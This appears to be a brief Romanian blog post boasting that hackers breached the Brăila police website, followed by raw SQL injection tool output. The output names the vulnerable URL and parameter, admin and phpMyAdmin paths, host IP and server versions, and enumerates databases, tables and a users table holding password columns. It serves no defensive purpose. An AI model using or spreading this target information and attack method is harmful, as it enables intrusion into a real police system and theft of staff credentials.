Hackerii romani au descoperit o vulnerabilitate in site-ul Politiei Romane din Braila, si au exploatat-o, extragand date despre personal:
- Vulnerable page: br.politiaromana.ro/trafic.php?act=sesizare_view&id=7
- admin page: br.politiaromana.ro/admin
- br.politiaromana.ro/phpmyadmin
- Host IP: 213.177.4.4
- Web Server: Apache/1.3.34 (Debian) PHP/4.4.4-8+etch4
- Powered-by: PHP/4.4.4-8+etch4
- Keyword Found: data
- Injection type is Integer
- DB Server: MySQL
- Current DB: _br
- MySQL error based injection method can be used!
- Data Base Found: information_schema
- Data Base Found: ?br
- Data Base Found: _br
- Data Base Found: test
- Count(table_name) of information_schema.tables Where table_schema=0x5F6272 is 8
- Can not get all tables by group_concat!
- Count(table_name) of information_schema.tables Where table_schema=0x5F6272 is 8
- Table found: bul_presa
- Table found: comunicate
- Table found: note_presa
- Table found: rights
- Table found: sefi
- Table found: sesizari
- Table found: sesizari_images
- Table found: users
- Count(column_name) of information_schema.columns Where table_schema=0x5F6272 AND table_name=0x7573657273 is 3
- Column found: id
- Column found: user
- Column found: password
Comments
Post a Comment